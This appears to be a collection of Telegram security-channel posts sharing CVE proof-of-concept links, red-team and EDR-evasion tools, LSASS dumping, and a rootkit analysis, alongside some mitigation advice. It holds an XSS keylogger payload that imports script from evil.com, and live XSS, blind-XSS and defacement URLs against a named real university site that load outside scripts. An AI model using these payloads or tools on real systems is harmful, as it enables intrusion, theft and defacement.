👁‍🗨UPDATED

💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare)

( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 )

♨️ cve-2024-49113 : the DOS vulnerability was assigned CVE-2024-49113

Windows 10 Version 1607 (both 32-bit and x64-based) up to 10.0.14393.7606
Windows Server 2012
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows 11 22H2
Windows Server 2022 23H2
Windows 11 24H2
Windows Server 2025

🚩 POC : https://github.com/SafeBreach-Labs/CVE-2024-49112
♨️ Blog : https://www.safebreach.com/blog/ldapnightmare-safebreach-labs-publishes-first-proof-of-concept-exploit-for-cve-2024-49113/

#RCE
#LDAP
#Active_Directory
#CVE
#DOS

@iDeFense

🕳 A Simple JS code to keylogger data and send it to the personal server + svg file to send the (document.cookie)

💣 https://github.com/11whoami99/XSS-keylogger

📝 USES :

The Keylogger in something like XSS Via OpenRedirect in Login Page :
==> ?domain=javascript%3aimport(//evil.com/xss.js)

📚 در یک وب‌سایت آسیب‌پذیر xss، ممکن است پارامتر domain یا مشابه آن به‌صورت مستقیم در redirect استفاده شود:

🔬https://example.com/redirect?domain=https://legit-site.com

مهاجم لینک زیر را می‌سازد:

🔬https://example.com/redirect?domain=javascript:import(//evil.com/xss.js)

#XSS
#Open_Redirect
#keylogger
#web

@iDeFense

🔬 پروژه NetAlertX ابزاری برای مانیتورینگ و مدیریت شبکه‌های WiFi و LAN است که قابلیت‌های متعددی را برای نظارت، شناسایی تغییرات، و ایجاد هشدارها ارائه می‌دهد. این ابزار برای کسانی که می‌خواهند شبکه خود را از نظر امنیتی و عملکردی رصد کنند مفید است

🔍 https://github.com/jokob-sk/NetAlertX

🔷 بررسی دستگاه‌های متصل به شبکه (مانند کامپیوترها، موبایل‌ها، دوربین‌ها و غیره)
🔷 شناسایی تغییرات در پورت‌ها یا اتصال دستگاه‌های جدید
🔷 امکان برنامه‌ریزی برای اسکن دوره‌ای شبکه به منظور شناسایی دستگاه‌های متصل
🔷 تغییرات در پورت‌ها
🔷 اضافه شدن دستگاه‌های ناشناس
🔷 سیستم هشدار (Alert) و ...

#Network
#tools
#wifi

@iDeFense

〽️ پروژه LitterBox به‌طور خاص برای توسعه و آزمایش تکنیک‌های اجتناب از شناسایی و تحلیل رفتار فایل‌ها یا فرآیندها طراحی شده است. هدف اصلی این پلتفرم کمک به متخصصین امنیتی است تا پیلود ها (Payloads) و ابزارهای خود را قبل از اجرای واقعی آزمایش و بهینه کنند
📦 https://github.com/BlackSnufkin/LitterBox

♾️ توسعه‌دهندگان و متخصصان امنیتی میتوانند از این ابزار به‌عنوان یک محیط شبیه‌سازی (Sandbox) جهت

🔺 روش‌های گریز از شناسایی (Evasion Techniques)
🔺 امضاهای شناسایی (Detection Signatures) را ارزیابی کنند
🔺 رفتار بدافزارها را بدون تأثیر بر سیستم‌های واقعی بررسی و تحلیل کنند

➕ قابلیت تحلیل ایستا (Static Analysis) و تحلیل پویا (Dynamic Analysis)

🔘 شناسایی فایل با الگوریتم‌های هش (MD5، SHA256)
🔘 محاسبه آنتروپی شانن برای تشخیص رمزگذاری‌ها
🔘 تحلیل نوع فایل و شناسایی MIME
🔘 تشخیص نوع فایل PE
🔘 شناسایی معماری ماشین (x86، x64)
🔘 تحلیل تاریخ کامپایل
🔘 طبقه‌بندی Subsystem
🔘 تشخیص Entry Point
🔘 نقشه‌برداری وابستگی DLLهای وارد شده (Import DLL).
📑 تحلیل اسناد آفیس
🔘 تشخیص و استخراج ماکروها
🔘 تحلیل کد VBA و شناسایی محتوای مخفی

✔️ پایش رفتار با اجرا مستقیم فایل‌ها و تحلیل
✔️ بازرسی مناطق حافظه
✔️ تشخیص تزریق فرآیند (Process Hollowing)
✔️ تحلیل تکنیک‌های تزریق (Injection Techniques)
✔️ نظارت بر Sleep Patterns

#RedTeam
#Sandboxing
#StaticAnalysis
#PayloadTesting
#DynamicAnalysis
#MalwareAnalysis
#ThreatSimulation
#MalwareDevelopment
#AdvancedThreatAnalysis

@iDeFense

🛟 To mitigate the risks associated with CVE-2024-49112, organizations should implement several strategies.

🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.

🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.

🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.

@iDeFense

🌐 پروژه NjForward یک ابزار رایگان و متن‌باز برای پورت فورواردینگ و ایجاد VPN خصوصی در ویندوز، که امکان ایجاد تونل‌های TCP را برای اهداف مختلف (شامل تست‌های امنیتی و نیازهای تخصصی شبکه) فراهم می‌کند...
جایگزینی بهینه و قابل‌اعتمادتر نسبت به RDP

🕸 https://github.com/ac3ss0r/NjForward/

#PortForwarding
#RedTeam
#tools
#TCPtunneling

@iDeFense

🚩 استفاده از Cloudflared برای ایجاد تونل‌های امن و حفظ پایداری در RedTeaming
👁‍🗨 https://www.youtube.com/watch?v=JC1hIppKLhI

🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تست‌های نفوذ
👁‍🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec

#PenetrationTesting
#RedTeam
#tools
#BypassDefense

@iDeFense

🔬 Dumping LSASS.exe Process Memory (Windows Defender Bypass 2025)

👁‍🗨 Video : https://youtu.be/GoxR7W6vjns?si=D9b_rpN4tqRb_0rd

🛠 Tools ==> https://github.com/ricardojoserf/NativeDump
📚 https://ricardojoserf.github.io/nativedump/

🔗 related: https://t.iss.one/iDefense/616

🚩 https://attack.mitre.org/techniques/T1003/001/



#Dump_Lsass
#RedTeam
#NTAPI
#BypassDefense
#Bypass
#Credential_Access

@iDeFense

🔻 Cambridge University 🎓

⭕️ Bug : XSS

👁‍🗨 alert Bug 🤷‍♀️

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E

👁‍🗨 blind XSS 🤷‍♀️

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E

👁‍🗨 deface POC :

https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/VYHMKG89QIWNM%3E%3C/script%3E

#BUG
#XSS
#vulnerable
#WEB

@iDeFense

👨‍💻 OSCP (PWK) Cheat Sheet.

📚 Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP).

- Basics;
- Information Gathering;
- Vulnerability Analysis;
- Web Application Analysis;
- Database Assessment;
- Password Attacks;
- Exploitation Tools;
- Post Exploitation;
- Exploit Databases;
- CVEs;
- Payloads;
- Wordlists;
- Social Media Resources;
- Commands.

#OSCP
#PWK
#CheatSheet

@iDeFense

‼Common pentests VS Real APT Attacks 😬

#fun
#APT
#PenetrationTesting

@iDeFense

👻 Ghost: Shellcode Loader

💢 پروژه Ghost ابزاری برای دور زدن قابلیت‌های تشخیصی که معمولاً توسط سیستم‌های EDR پیاده‌سازی می‌شوند...

👁‍🗨 https://github.com/cpu0x00/Ghost

🔺 دور زدن kernel callbacks با استفاده از fiber threads

⚙️ با استفاده از این fiber threads، می‌توان عملیات‌های خطرناک را به نحوی انجام داد که ابزارهای امنیتی که در سطح هسته (kernel) کار می‌کنند، نتوانند آن‌ها را شناسایی کنند

🔺 جعل (Return Address Spoofing) , (Stack Spoofing)

⚙️این تکنیک شامل تغییرات در پشته فراخوانی (Call Stack) است تا مسیر واقعی اجرای برنامه پنهان بماند. با این کار، می‌توان عملکردهای مخرب را به نحوی فراخوانی کرد که ابزارهای امنیتی نتوانند آن‌ها را شناسایی یا متوقف کنند

🔺 پنهان‌سازی شل کد در داخل مناطق حافظه بزرگ و تصادفی

⚙️ این تکنیک با پنهان کردن شل کد در بخش‌هایی از حافظه که اندازه بزرگ و تصادفی دارند، می‌تواند از شناسایی آن توسط ابزارهای امنیتی جلوگیری کند. این بخش‌های حافظه ممکن است به طور تصادفی تخصیص داده شوند تا شل کد در نواحی غیرمنتظره قرار گیرد

🔺غیرفعال کردن ETW

🔺حذف توابع EDR از فرآیندهای معلق

⚙️ این ویژگی به نرم‌افزار اجازه می‌دهد تا توابعی که توسط ابزارهای EDR برای شناسایی تهدیدها به فرآیندهای سیستم افزوده شده‌اند را حذف کند

🔺هشینگ سفارشی API برای حل توابع

⚙️ این تکنیک از هش‌های سفارشی برای توابع API استفاده می‌کند تا از شناسایی و تجزیه و تحلیل آن‌ها توسط ابزارهای امنیتی جلوگیری کند

#EDR
#Defense_Evasion
#tools
#Bypass
#BypassDefense
#Detection

@iDeFense

⭕️ CVE-2024-49138 : Windows Common Log File System Driver Privilege Escalation
📝 به گزارش CrowdStrike آسیب‌پذیری شناسایی شده به طور فعال توسط عوامل تهدید مورد سوء استفاده قرار می‌گرفت

⚠️ Tested on Windows 11 23h2

♨️ POC : https://github.com/MrAle98/CVE-2024-49138-POC

🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138

#CVE
#Privilege_escalation

@iDeFense

🔬 Deep Dive Into a Linux Rootkit Malware

📝 تیم FortiGuard Incident Response (FGIR) در حین بررسی یک حادثه امنیتی متوجه شد که مهاجم از آسیب‌پذیری CVE-2024-8190 بر روی سرویس‌های ابری Ivanti و دو آسیب‌پذیری دیگر (که یکی مربوط به (Path Traversal) در منبع /client/index.php که به مهاجم این امکان را می‌دهد که به منابع دیگری مانند users.php، reports.php و... دسترسی غیرمجاز پیدا کند ( CVE-2024-8963 ) و دیگری به تزریق دستور (Command Injection) در منبع reports.php مربوط می‌شود CVE-2024-9380 ) برای نفوذ به سیستم‌های Ivanti و دسترسی غیرمجاز به منابع مختلف استفاده کرده است

🦠 پس از نفوذ به سیستم، مهاجمان یک rootkit (که در اینجا یک ماژول کرنل قابل بارگذاری به نام sysinitd.ko است) و یک فایل باینری در فضای کاربر به نام sysinitd را مستقر کرده‌اند
🕷 استفاده از اسکریپت برای نصب rootkit: مهاجمان از یک Shell script به نام Install[.]sh برای نصب و راه‌اندازی rootkit و باینری‌ها استفاده کرده‌اند

🔍 پایداری rootkit : برای اطمینان از اینکه rootkit به‌طور خودکار در هر بار راه‌اندازی سیستم اجرا شود، ورودی‌هایی برای این rootkit به فایل‌های سیستم مانند

/etc/rc.local و /etc/rc.d/rc.local

اضافه شده است که این فایل‌ها برای بارگذاری خودکار برنامه‌ها هنگام شروع سیستم استفاده می‌شوند...
🔬 Deep Dive Into This Linux Rootkit

👁‍🗨 https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa (بررسی حمله)
|
‌ ∟📂 https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware (بررسی روت کیت)

#Linux
#Rootkit
#Malware
#Ivanti
#Cloud_Services
#analysis

@iDeFense

🔻 CVE-2024-43468 Microsoft Configuration Manager (ConfigMgr / SCCM) 2403
🦠 Unauthenticated SQL injections (CVE-2024-43468) exploit

🔻 نسخه‌های آسیب‌پذیر
⚠️ تمام نسخه‌های Microsoft Configuration Manager که یکی از به‌روزرسانی‌های زیر را ندارند، آسیب‌پذیر هستند:

نسخه‌های پایین‌تر از 2403 (شماره نسخه: 5.00.9128.1024)
نسخه‌های پایین‌تر از 2309 (شماره نسخه: 5.00.9122.1033)
نسخه‌های پایین‌تر از 2303 (شماره نسخه: 5.00.9106.1037)
نسخه‌های 2211 و قدیمی‌تر

🔬 https://telegra.ph/آسیب‌پذیری-CVE-2024-43468-SQL-Injection-بر-روی-Microsoft-Configuration-Manager-بدون-نیاز-به-احراز-هویت-01-17

📚https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
(16/01/2025)

♨️ POC: https://github.com/synacktiv/CVE-2024-43468

🔰 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468

#SQL_injections
#SQLInjection
#ConfigMgr
#SCCM
#RCE
#CVE

@iDeFense

♾ Soc Teams VS APT Teams🫤

#fun
#APT
#soc

@iDeFense

👽 Hunting for Persistence in Linux:

🔘 (Part 1): Auditd, Sysmon, Osquery (and Webshells);

🔘 (Part 2): Account Creation and Manipulation;

🔘 (Part 3): Systemd, Timers, and Cron;

🔘 (Part 4): Initialization Scripts and Shell Configuration;

🔘 (Part 5): Systemd Generators.

#Linux
#RedTeam
#BlueTeam
#persistence
#auditd

@iDeFense

‼️ Chief information security officer (CISO) VS Hacker 🤪

#fun
#CISO
#phishing
#sim_Jacking
#Credential_stuffing
#Social_engineering
#MFA_Bypass_Proxy
#AI_Powered_Phishing

@iDeFense

🚧 مجموعه LOLC2 معرفی فریم‌ورک‌های C2 است که از سرویس‌های قانونی و معتبر برای پنهان شدن از سیستم‌های تشخیص استفاده می‌کند

♦️ در میان این فریم‌ورک‌ها، برخی از C2ها عبارتند از:
Telegram, Asana, OneDrive, Microsoft Tasks, Jira, Notion👀,splunk🪱 و دیگر سرویس‌های مشابه

🔰 روش‌های تشخیص:
🔍 تدوین قوانین و فیلتر کردن اتصالات
🔍 تحلیل رفتار (Behavioral Analysis) برای شناسایی فعالیت‌ها
🔍 استفاده از ابزار یارا (Yara)
🔍 نظارت بر فرآیندها و درخواست‌های API

🔗 https://lolc2.github.io/

#C2Frameworks
#MalwareDetection
#LOLC2
#BehavioralAnalysis
#APIMonitoring
#YaraRules
#ThreatDetection
#NetworkSecurity
#RedTeam
#SOC

@iDeFense